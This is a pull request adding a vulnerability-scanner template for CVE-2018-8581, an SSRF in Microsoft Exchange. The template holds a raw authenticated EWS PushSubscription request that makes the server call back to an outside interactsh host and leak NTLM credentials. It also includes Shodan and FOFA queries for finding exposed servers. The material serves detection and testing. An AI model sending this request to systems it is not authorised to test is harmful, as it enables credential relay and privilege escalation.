### PR TITLE
feat: Add CVE-2018-8581 Exchange Server SSRF template

### DIFF
--- a/http/cves/2018/CVE-2018-8581.yaml
+++ b/http/cves/2018/CVE-2018-8581.yaml
@@ -1,0 +1,80 @@
+id: CVE-2018-8581
+
+info:
+  name: Microsoft Exchange Server - SSRF to Privilege Escalation
+  author: njg7194
+  severity: high
+  description: |
+    Microsoft Exchange Server contains a server-side request forgery vulnerability that allows 
+    an authenticated attacker to impersonate another user. When Exchange sends a push notification 
+    via PushSubscription, it connects back to the specified URL and authenticates as the Exchange 
+    server itself (NT AUTHORITY\SYSTEM). An attacker can relay these credentials to escalate privileges.
+  reference:
+    - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2018-8581
+    - https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin/
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-8581
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
+    cvss-score: 8.1
+    cve-id: CVE-2018-8581
+    cwe-id: CWE-918
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: microsoft
+    product: exchange_server
+    shodan-query: http.title:"Outlook Web App"
+    fofa-query: title="Outlook Web App"
+  tags: cve,cve2018,ssrf,exchange,microsoft,kev
+
+http:
+  - raw:
+      - |
+        POST /EWS/Exchange.asmx HTTP/1.1
+        Host: {{Hostname}}
+        Authorization: Basic {{base64(username + ':' + password)}}
+        Content-Type: text/xml; charset=utf-8
+
+        <?xml version="1.0" encoding="utf-8"?>
+        <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
+                       xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types"
+                       xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages">
+          <soap:Header>
+            <t:RequestServerVersion Version="Exchange2013"/>
+          </soap:Header>
+          <soap:Body>
+            <m:Subscribe>
+              <m:PushSubscriptionRequest>
+                <t:FolderIds>
+                  <t:DistinguishedFolderId Id="inbox"/>
+                </t:FolderIds>
+                <t:EventTypes>
+                  <t:EventType>NewMailEvent</t:EventType>
+                </t:EventTypes>
+                <t:StatusFrequency>1</t:StatusFrequency>
+                <t:URL>{{interactsh-url}}</t:URL>
+              </m:PushSubscriptionRequest>
+            </m:Subscribe>
+          </soap:Body>
+        </soap:Envelope>
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "http"
+
+      - type: word
+        part: interactsh_request
+        words:
+          - "NTLM"
+          - "Authorization"
+        condition: or
+
+    extractors:
+      - type: regex
+        group: 1
+        regex:
+          - '<m:SubscriptionId>([^<]+)</m:SubscriptionId>'
+        part: body


### PR DESCRIPTION
## Summary
Adds detection template for CVE-2018-8581 - Microsoft Exchange Server SSRF leading to privilege escalation.

## Description
- Uses EWS PushSubscription API to trigger SSRF
- Detects NTLM relay via interactsh callback
- Properly extracts SubscriptionId

## References
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2018-8581
- https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin/

## Issue
Closes #14576

## Bounty
This PR is submitted for the $100 bounty on issue #14576.